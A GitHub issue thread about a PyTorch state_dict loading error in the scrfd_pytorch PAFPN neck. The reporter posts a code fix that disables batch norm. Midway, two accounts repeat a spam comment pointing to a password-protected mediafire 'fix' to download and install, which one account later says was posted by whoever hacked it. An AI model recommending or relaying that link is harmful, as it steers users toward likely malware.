### ISSUE TITLE
RuntimeError: Error(s) in loading state_dict for PAFPN:

### ISSUE THREAD

**Issue by Luh1124** [ponjoru/scrfd_pytorch#1]
"I executed convert_weights.py and downloaded the weights with KPS from InsightFace, but encountered the following error:"

2024-08-27 11:21:29.470 | WARNING  | scrfd.init_utils:initialize_module_weights:178 - 78% of weights changed after initialization of the module: PAFPN
2024-08-27 11:21:29.485 | WARNING  | scrfd.init_utils:initialize_module_weights:178 - 73% of weights changed after initialization of the module: SCRFDHead
Traceback (most recent call last):
  File "/pfs/mt-1oY5F7/lihong/iclr/SDXL-Lightning/ext/scrfd_pytorch/scripts/convert_weights.py", line 87, in <module>
    convert(model, vanilla_sd, save_path, use_scale=False)
  File "/pfs/mt-1oY5F7/lihong/iclr/SDXL-Lightning/ext/scrfd_pytorch/scripts/convert_weights.py", line 22, in convert
    model.neck.load_state_dict(n_sd)
  File "/pfs/mt-1oY5F7/lihong/miniconda3/envs/promptavatar/lib/python3.10/site-packages/torch/nn/modules/module.py", line 2152, in load_state_dict
    raise RuntimeError('Error(s) in loading state_dict for {}:\n\t{}'.format(
RuntimeError: Error(s) in loading state_dict for PAFPN:
        Missing key(s) in state_dict: "downsample_convs.0.conv.weight", "downsample_convs.0.bn.weight", "downsample_convs.0.bn.bias", "downsample_convs.0.bn.running_mean", "downsample_convs.0.bn.running_var", "downsample_convs.1.conv.weight", "downsample_convs.1.bn.weight", "downsample_convs.1.bn.bias", "downsample_convs.1.bn.running_mean", "downsample_convs.1.bn.running_var", "pafpn_convs.0.conv.weight", "pafpn_convs.0.bn.weight", "pafpn_convs.0.bn.bias", "pafpn_convs.0.bn.running_mean", "pafpn_convs.0.bn.running_var", "pafpn_convs.1.conv.weight", "pafpn_convs.1.bn.weight", "pafpn_convs.1.bn.bias", "pafpn_convs.1.bn.running_mean", "pafpn_convs.1.bn.running_var". 
        Unexpected key(s) in state_dict: "downsample_convs.0.weight", "downsample_convs.0.bias", "downsample_convs.1.weight", "downsample_convs.1.bias", "pafpn_convs.0.weight", "pafpn_convs.0.bias", "pafpn_convs.1.weight", "pafpn_convs.1.bias". 
        
        
  the version of torch is '2.1.1+cu118'

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Luh1124** [comment]
I have solved it，origin pth‘s neck don‘t have bn norm

```
from typing import List, Union, Tuple, Dict, Optional
from loguru import logger
import warnings
from .utils import ConvBnAct


class FPN(nn.Module):
def __init__(
        self.downsample_convs = nn.ModuleList()
        self.pafpn_convs = nn.ModuleList()
        for i in range(self.start_level + 1, self.backbone_end_level):
            d_conv = ConvBnAct(out_channels, out_channels, kernel_size=(3, 3), stride=(2, 2), padding=1, with_norm=False)
            pafpn_conv = ConvBnAct(out_channels, out_channels, kernel_size=(3, 3), padding=1, with_norm=False)
            # d_conv = nn.Conv2d(out_channels, out_channels, (3, 3), stride=(2, 2), padding=1)
            # pafpn_conv = nn.Conv2d(out_channels, out_channels, (3, 3), padding=1)
            self.downsample_convs.append(d_conv)
      
            self.pafpn_convs.append(pafpn_conv)
```

**Comment by Luh1124** [comment]
![image](https://github.com/user-attachments/assets/1b5a103f-9dce-4c7b-89c0-efde80abac92)

**Comment by amir1387aht** [comment]
Guys Please Listen To Me. I Think Im Hacked, Please Don't Open That Link I Send, I Changed My Password But Please Don't Trust Links From Me

**Comment by Luh1124** [comment]
> Guys Please Listen To Me. I Think Im Hacked, Please Don't Open That Link I Send, I Changed My Password But Please Don't Trust Links From Me

Bro, you are really awesome.

**Comment by Luh1124** [comment]
> Guys Please Listen To Me. I Think Im Hacked, Please Don't Open That Link I Send, I Changed My Password But Please Don't Trust Links From Me

you can delete the link

**Comment by amir1387aht** [comment]
> > Guys Please Listen To Me. I Think Im Hacked, Please Don't Open That Link I Send, I Changed My Password But Please Don't Trust Links From Me
> 
> you can delete the link

Yes But There Is Also 500 Another Messages was Send as Me and Im Trying to Delete Them, But I Thicketed Github and I Send Them This Issue Link To Them To Analyze, But I Edit It
